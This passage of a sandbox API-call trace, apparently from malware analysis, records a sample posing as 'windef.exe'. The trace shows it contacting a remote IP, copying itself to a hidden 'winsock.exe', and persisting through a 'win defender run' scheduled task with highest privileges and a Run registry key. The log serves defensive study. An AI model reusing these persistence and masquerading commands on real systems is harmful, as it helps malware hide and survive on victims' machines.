[42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x300053a, FirstDnsSuffix=0x0), SizePointer=0x19f118*=0xa78) returned 0x0 [0168.244] LocalFree (hMem=0x56b8d0) returned 0x0 [0168.252] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f128 | out: phkResult=0x19f128*=0x588) returned 0x0 [0168.252] RegQueryValueExW (in: hKey=0x588, lpValueName="HWRPortReuseOnSocketBind", lpReserved=0x0, lpType=0x19f144, lpData=0x0, lpcbData=0x19f140*=0x0 | out: lpType=0x19f144*=0x0, lpData=0x0, lpcbData=0x19f140*=0x0) returned 0x2 [0168.252] RegCloseKey (hKey=0x588) returned 0x0 [0168.253] WSAConnect (in: s=0x568, name=0x2167b6c*(sa_family=2, sin_port=0x50, sin_addr="208.95.112.1"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0168.292] closesocket (s=0x540) returned 0 [0168.299] send (s=0x568, buf=0x216878c*, len=144, flags=0) returned 144 [0168.303] setsockopt (s=0x568, level=65535, optname=4102, optval="\x10'", optlen=4) returned 0 [0168.304] recv (in: s=0x568, buf=0x2163b8c, len=4096, flags=0 | out: buf=0x2163b8c*) returned 467 [0168.358] setsockopt (s=0x568, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0 [0168.358] SetEvent (hEvent=0x3f4) returned 1 [0169.128] EtwEventRegister (in: ProviderId=0x2178344, EnableCallback=0x47d066e, CallbackContext=0x0, RegHandle=0x2178320 | out: RegHandle=0x2178320) returned 0x0 [0169.196] GetCurrentProcess () returned 0xffffffff [0169.196] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19ee60 | out: TokenHandle=0x19ee60*=0x588) returned 1 [0169.202] GetCurrentProcess () returned 0xffffffff [0169.202] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19ee74 | out: TokenHandle=0x19ee74*=0x58c) returned 1 [0169.676] DeleteFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\windef.exe:Zone.Identifier" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\windef.exe:zone.identifier")) returned 0 [0169.681] CloseHandle (hObject=0x3c8) returned 1 [0169.716] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir", nBufferLength=0x105, lpBuffer=0x19ef5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir", lpFilePart=0x0) returned 0x2c [0169.717] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f3b8) returned 1 [0169.718] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\subdir"), fInfoLevelId=0x0, lpFileInformation=0x19f434 | out: lpFileInformation=0x19f434*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0169.718] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f3b4) returned 1 [0169.718] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir", nBufferLength=0x105, lpBuffer=0x19ef60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir", lpFilePart=0x0) returned 0x2c [0169.719] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f348) returned 1 [0169.719] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\subdir"), fInfoLevelId=0x0, lpFileInformation=0x19f3c4 | out: lpFileInformation=0x19f3c4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0169.719] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f344) returned 1 [0169.720] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f348) returned 1 [0169.720] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\subdir"), fInfoLevelId=0x0, lpFileInformation=0x19f3c4 | out: lpFileInformation=0x19f3c4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0169.720] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f344) returned 1 [0169.720] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f348) returned 1 [0169.720] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming"), fInfoLevelId=0x0, lpFileInformation=0x19f3c4 | out: lpFileInformation=0x19f3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xd40d7588, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0xd40d7588, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0169.721] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f344) returned 1 [0169.728] CreateDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\subdir"), lpSecurityAttributes=0x0) returned 1 [0169.730] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe", nBufferLength=0x105, lpBuffer=0x19ef64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe", lpFilePart=0x0) returned 0x38 [0169.730] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f3c4) returned 1 [0169.730] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\subdir\\winsock.exe"), fInfoLevelId=0x0, lpFileInformation=0x19f440 | out: lpFileInformation=0x19f440*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0169.730] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f3c0) returned 1 [0169.731] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\", lpszLongPath=0x19ef00, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\") returned 0x16 [0169.732] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\windef.exe", nBufferLength=0x105, lpBuffer=0x19ef14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\windef.exe", lpFilePart=0x0) returned 0x33 [0169.732] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe", nBufferLength=0x105, lpBuffer=0x19ef14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe", lpFilePart=0x0) returned 0x38 [0169.733] CopyFileW (lpExistingFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\windef.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\windef.exe"), lpNewFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\subdir\\winsock.exe"), bFailIfExists=0) returned 1 [0171.675] GetCurrentProcess () returned 0xffffffff [0171.675] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19f3b4 | out: TokenHandle=0x19f3b4*=0x3c8) returned 1 [0171.680] GetTokenInformation (in: TokenHandle=0x3c8, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x19f3b4 | out: TokenInformation=0x0, ReturnLength=0x19f3b4) returned 0 [0171.680] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x54ba70 [0171.680] GetTokenInformation (in: TokenHandle=0x3c8, TokenInformationClass=0x8, TokenInformation=0x54ba70, TokenInformationLength=0x4, ReturnLength=0x19f3b4 | out: TokenInformation=0x54ba70, ReturnLength=0x19f3b4) returned 1 [0171.683] LocalFree (hMem=0x54ba70) returned 0x0 [0171.685] DuplicateTokenEx (in: hExistingToken=0x3c8, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x19f3bc | out: phNewToken=0x19f3bc*=0x590) returned 1 [0171.686] CheckTokenMembership (in: TokenHandle=0x590, SidToCheck=0x218b60c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x19f3cc | out: IsMember=0x19f3cc) returned 1 [0171.686] CloseHandle (hObject=0x590) returned 1 [0171.687] CloseHandle (hObject=0x3c8) returned 1 [0171.695] CoTaskMemAlloc (cb=0x20e) returned 0x578618 [0171.695] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x578618 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0171.696] CoTaskMemFree (pv=0x578618) [0171.700] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"schtasks\" /create /tn \"win defender run\" /sc ONLOGON /tr \"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\windef.exe\" /rl HIGHEST /f", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f1a8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x218baec | out: lpCommandLine="\"schtasks\" /create /tn \"win defender run\" /sc ONLOGON /tr \"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\windef.exe\" /rl HIGHEST /f", lpProcessInformation=0x218baec*(hProcess=0x590, hThread=0x3c8, dwProcessId=0x1058, dwThreadId=0x1064)) returned 1 [0172.143] CloseHandle (hObject=0x3c8) returned 1 [0172.143] GetCurrentProcess () returned 0xffffffff [0172.144] GetCurrentProcess () returned 0xffffffff [0172.144] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x590, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x19f3cc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x19f3cc*=0x3c8) returned 1 [0172.145] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x3e8, cHandles=0x1, pHandles=0x19f3c4*=0x3c8, lpdwindex=0x19f1e4 | out: lpdwindex=0x19f1e4) returned 0x80010115 [0172.146] CoGetContextToken (in: pToken=0x19e1fc | out: pToken=0x19e1fc) returned 0x0 [0172.146] CoGetContextToken (in: pToken=0x19e1e4 | out: pToken=0x19e1e4) returned 0x0 [0172.146] CoGetContextToken (in: pToken=0x19e170 | out: pToken=0x19e170) returned 0x0 [0172.146] WbemLocator:IUnknown:Release (This=0x513fa8) returned 0x1 [0172.146] WbemLocator:IUnknown:Release (This=0x4e2878) returned 0x0 [0172.147] CoGetContextToken (in: pToken=0x19e170 | out: pToken=0x19e170) returned 0x0 [0172.147] IUnknown:Release (This=0x5446b0) returned 0x2 [0172.147] IUnknown:Release (This=0x5446b0) returned 0x1 [0172.149] CoGetContextToken (in: pToken=0x19e1fc | out: pToken=0x19e1fc) returned 0x0 [0172.149] CoGetContextToken (in: pToken=0x19e1bc | out: pToken=0x19e1bc) returned 0x0 [0172.149] WbemLocator:IUnknown:Release (This=0x5167c8) returned 0x1 [0172.149] IUnknown:Release (This=0x505518) returned 0x0 [0173.353] CloseHandle (hObject=0x3c8) returned 1 [0173.356] GetExitCodeProcess (in: hProcess=0x590, lpExitCode=0x19f42c | out: lpExitCode=0x19f42c*=0x103) returned 1 [0173.357] GetCurrentProcess () returned 0xffffffff [0173.357] GetCurrentProcess () returned 0xffffffff [0173.358] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x590, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x19f3b0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x19f3b0*=0x3c8) returned 1 [0173.358] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x19f3a8*=0x3c8, lpdwindex=0x19f1c4 | out: lpdwindex=0x19f1c4) returned 0x80010115 [0173.359] CloseHandle (hObject=0x3c8) returned 1 [0173.748] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x2011f, phkResult=0x19f3b4 | out: phkResult=0x19f3b4*=0x3c8) returned 0x0 [0173.750] RegQueryValueExW (in: hKey=0x3c8, lpValueName="win defender run", lpReserved=0x0, lpType=0x19f3d0, lpData=0x0, lpcbData=0x19f3cc*=0x0 | out: lpType=0x19f3d0*=0x0, lpData=0x0, lpcbData=0x19f3cc*=0x0) returned 0x2 [0173.817] RegSetValueExW (in: hKey=0x3c8, lpValueName="win defender run", Reserved=0x0, dwType=0x1, lpData="\"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\windef.exe\"", cbData=0x64 | out: lpData="\"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\windef.exe\"") returned 0x0 [0173.818] RegCloseKey (hKey=0x3c8) returned 0x0 [0173.822] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe", nBufferLength=0x105, lpBuffer=0x19ef74, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe", lpFilePart=0x0) returned 0x38 [0173.827] SetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe", dwFileAttributes=0x2) returned 1 [0173.828] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe:Zone.Identifier" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\subdir\\winsock.exe:zone.identifier")) returned 0 [0173.831] CoTaskMemAlloc (cb=0x20e) returned 0x5787e0 [0173.831] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x5787e0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0173.832] CoTaskMemFree (pv=0x5787e0) [0173.832] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f1dc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x218e034 | out: lpCommandLine="\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe\"", lpProcessInformation=0x218e034*(hProcess=0x364, hThread=0x3c8, dwProcessId=0x10b4, dwThreadId=0x10bc)) returned 1 [0174.404] CloseHandle (hObject=0x3c8) returned 1 [0174.550] CreateSemaphoreW (lpSemaphoreAttributes=0x0, lInitialCount=2, lMaximumCount=2, lpName=0x0) returned 0x3c8 [0175.445] GetCurrentProcess () returned 0xffffffff [0175.445] GetCurrentThread () returned 0xfffffffe [0175.446] GetCurrentProcess () returned 0xffffffff [0175.446] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x19f4cc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x19f4cc*=0x35c) returned 1 [0175.451] GetCurrentThreadId () returned 0x5c0 [0175.458] OleInitialize (pvReserved=0x0) returned 0x0 [0175.461] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0x19f4b0 | out: lplpMessageFilter=0x19f4b0*=0x0) returned 0x0 [0175.464] CoGetContextToken (in: pToken=0x19f368 | out: pToken=0x19f368) returned 0x0 [0175.464] IUnknown:QueryInterface (in: This=0x4d10a0, riid=0x6cc04564*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f38c | out: ppvObject=0x19f38c*=0x4d10ac) returned 0x0 [0175.465] IComThreadingInfo:GetCurrentThreadType (in: This=0x4d10ac, pThreadType=0x19f3ec | out: pThreadType=0x19f3ec*=1) returned 0x0 [0175.465] IUnknown:Release (This=0x4d10ac) returned 0x0 [0175.466] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x13880, cHandles=0x1, pHandles=0x4976f8*=0x130, lpdwindex=0x19f20c | out: lpdwindex=0x19f20c) returned 0x0 Thread: id = 13 os_tid = 0x8b8 Thread: id = 14 os_tid = 0x474 Thread: id = 15 os_tid = 0x59c [0144.990] CoGetContextToken (in: pToken=0x42ffc3c | out: pToken=0x42ffc3c) returned 0x800401f0 [0144.990] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0144.990] RoInitialize () returned 0x1 [0144.990] RoUninitialize () returned 0x0 [0163.411] CoGetContextToken (in: pToken=0x42ffc30 | out: pToken=0x42ffc30) returned 0x0 [0163.411] CoGetContextToken (in: pToken=0x42ffbb8 | out: pToken=0x42ffbb8) returned 0x0 [0163.411] WbemLocator:IUnknown:Release (This=0x4f5360) returned 0x1 [0163.411] WbemLocator:IUnknown:Release (This=0x4f5360) returned 0x0 [0163.411] CoGetContextToken (in: pToken=0x42ffc30 | out: pToken=0x42ffc30) returned 0x0 [0163.411] IUnknown:QueryInterface (in: This=0x4d10a0, riid=0x6cc38724*(Data1=0x1da, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x42ffbd8 | out: ppvObject=0x42ffbd8*=0x4d10b0) returned 0x0 [0163.412] CObjectContext::ContextCallback () returned 0x0 [0172.147] IUnknown:Release (This=0x4d10b0) returned 0x1 [0172.147] IUnknown:Release (This=0x5446b0) returned 0x0 [0172.148] CoGetContextToken (in: pToken=0x42ffa50 | out: pToken=0x42ffa50) returned 0x0 [0172.148] IUnknown:QueryInterface (in: This=0x4d10a0, riid=0x6cc38724*(Data1=0x1da, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x42ff9f8 | out: ppvObject=0x42ff9f8*=0x4d10b0) returned 0x0 [0172.148] CObjectContext::ContextCallback () returned 0x0 [0172.487] IUnknown:Release (This=0x4d10b0) returned 0x1 [0172.487] IUnknown:Release (This=0x4d10a0) returned 0x0 [0172.490] CryptDestroyKey (hKey=0x4e1900) returned 1 [0172.490] CryptReleaseContext (hProv=0x4ea398, dwFlags=0x0) returned 1 [0172.490] CryptReleaseContext (hProv=0x4ea398, dwFlags=0x0) returned 1 [0172.491] CryptDestroyKey (hKey=0x4e1680) returned 1 [0172.491] CryptReleaseContext (hProv=0x4ea200, dwFlags=0x0) returned 1 [0172.491] CryptReleaseContext (hProv=0x4ea200, dwFlags=0x0) returned 1 [0172.492] CryptDestroyKey (hKey=0x4e1780) returned 1 [0172.492] CryptReleaseContext (hProv=0x4e9c28, dwFlags=0x0) returned 1 [0172.492] CryptReleaseContext (hProv=0x4e9c28, dwFlags=0x0) returned 1 [0172.492] CryptDestroyKey (hKey=0x4e18c0) returned 1 [0172.493] CryptReleaseContext (hProv=0x4e9b18, dwFlags=0x0) returned 1 [0172.493] CryptReleaseContext (hProv=0x4e9b18, dwFlags=0x0) returned 1 [0172.495] CryptDestroyKey (hKey=0x4e1540) returned 1 [0172.496] CryptReleaseContext (hProv=0x4ea5b8, dwFlags=0x0) returned 1 [0172.496] CryptReleaseContext (hProv=0x4ea5b8, dwFlags=0x0) returned 1 [0172.497] CryptDestroyKey (hKey=0x4e1740) returned 1 [0172.497] CryptReleaseContext (hProv=0x4ea288, dwFlags=0x0) returned 1 [0172.498] CryptReleaseContext (hProv=0x4ea288, dwFlags=0x0) returned 1 [0172.499] CryptDestroyKey (hKey=0x4e1700) returned 1 [0172.499] CryptReleaseContext (hProv=0x4e9cb0, dwFlags=0x0) returned 1 [0172.499] CryptReleaseContext (hProv=0x4e9cb0, dwFlags=0x0) returned 1 [0172.500] CloseHandle (hObject=0x2d4) returned 1 [0172.501] CryptDestroyKey (hKey=0x4e19c0) returned 1 [0172.501] CryptReleaseContext (hProv=0x4ea310, dwFlags=0x0) returned 1 [0172.502] CryptReleaseContext (hProv=0x4ea310, dwFlags=0x0) returned 1 [0175.528] EtwEventUnregister (RegHandle=0x559470) returned 0x0 [0175.529] EtwEventUnregister (RegHandle=0x55a0a0) returned 0x0 [0175.538] CloseHandle (hObject=0x35c) returned 1 [0175.541] EtwEventUnregister (RegHandle=0x559060) returned 0x0 [0175.548] setsockopt (s=0x580, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0175.549] closesocket (s=0x580) returned 0 [0175.549] CloseHandle (hObject=0x584) returned 1 [0175.550] setsockopt (s=0x570, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0175.550] closesocket (s=0x570) returned 0 [0175.551] CloseHandle (hObject=0x57c) returned 1 [0175.552] setsockopt (s=0x568, level=65535, optname=128, optval="\x01", optlen=4) returned 0 [0175.552] closesocket (s=0x568) returned 0 [0175.555] CloseHandle (hObject=0x590) returned 1 [0175.556] CloseHandle (hObject=0x528) returned 1 [0175.556] UnmapViewOfFile (lpBaseAddress=0x5010000) returned 1 [0175.557] CloseHandle (hObject=0x508) returned 1 [0175.557] CloseHandle (hObject=0x504) returned 1 [0175.558] CloseHandle (hObject=0x500) returned 1 [0175.558] CloseHandle (hObject=0x4f4) returned 1 [0175.558] CloseHandle (hObject=0x364) returned 1 [0175.559] WinHttpCloseHandle (hInternet=0x565a20) returned 1 [0175.560] CloseHandle (hObject=0x4bc) returned 1 [0175.561] CloseHandle (hObject=0x4b8) returned 1 [0175.561] RegCloseKey (hKey=0x4b4) returned 0x0 [0175.562] CloseHandle (hObject=0x4b0) returned 1 [0175.562] RegCloseKey (hKey=0x4ac) returned 0x0 [0175.563] CloseHandle (hObject=0x49c) returned 1 [0175.563] RegCloseKey (hKey=0x498) returned 0x0 [0175.564] RegCloseKey (hKey=0x494) returned 0x0 [0175.564] CloseHandle (hObject=0x47c) returned 1 [0175.565] setsockopt (s=0x470, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0175.566] closesocket (s=0x470) returned 0 [0175.566] CloseHandle (hObject=0x474) returned 1 [0175.566] setsockopt (s=0x468, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0175.567] closesocket (s=0x468) returned 0 [0175.567] CloseHandle (hObject=0x46c) returned 1 [0175.568] RegCloseKey (hKey=0x80000004) returned 0x0 [0175.568] CloseHandle (hObject=0x418) returned 1 [0175.569] CloseHandle (hObject=0x414) returned 1 [0175.569] CloseHandle (hObject=0x410) returned 1 [0175.570] CloseHandle (hObject=0x40c) returned 1 [0175.570] CloseHandle (hObject=0x408) returned 1 [0175.571] CloseHandle (hObject=0x404) returned 1 [0175.571] CloseHandle (hObject=0x3fc) returned 1 [0175.572] CloseHandle (hObject=0x58c) returned 1 [0175.573] CloseHandle (hObject=0x588) returned 1 [0175.574] CloseHandle (hObject=0x3f0) returned 1 [0175.575] CloseHandle (hObject=0x3ec) returned 1 [0175.575] CloseHandle (hObject=0x3e8) returned 1 [0175.576] CloseHandle (hObject=0x3e4) returned 1 [0175.576] CloseHandle (hObject=0x3e0) returned 1 [0175.577] CloseHandle (hObject=0x3dc) returned 1 [0175.577] CloseHandle (hObject=0x3d0) returned 1 [0175.578] CloseHandle (hObject=0x3c8) returned 1 [0175.580] CloseHandle (hObject=0x3cc) returned 1 [0175.583] CoGetContextToken (in: pToken=0x42ff878 | out: pToken=0x42ff878) returned 0x0 [0175.583] CoGetContextToken (in: pToken=0x42ff800 | out: pToken=0x42ff800) returned 0x0 [0175.584] WbemLocator:IUnknown:Release (This=0x50c700) returned 0x1 [0175.584] WbemLocator:IUnknown:Release (This=0x4e2058) returned 0x0 [0175.588] CoReleaseMarshalData (pStm=0x504d90) returned 0x0 [0175.591] IUnknown:Release (This=0x4d1158) returned 0x0 [0175.591] CoGetContextToken (in: pToken=0x42ff878 | out: pToken=0x42ff878) returned 0x0 [0175.591] CoGetContextToken (in: pToken=0x42ff800 | out: pToken=0x42ff800) returned 0x0 [0175.591] WbemDefPath:IUnknown:Release (This=0x4f6390) returned 0x1 [0175.591] WbemDefPath:IUnknown:Release (This=0x4f6390) returned 0x0 Thread: id = 18 os_tid = 0x13e4 [0153.365] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0153.365] RoInitialize () returned 0x1 [0153.365] RoUninitialize () returned 0x0 [0153.418] IIDFromString (in: lpsz="{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}", lpiid=0x477f5b4 | out: lpiid=0x477f5b4) returned 0x0 [0153.424] CoGetClassObject (in: rclsid=0x4f605c*(Data1=0xcf4cc405, Data2=0xe2c5, 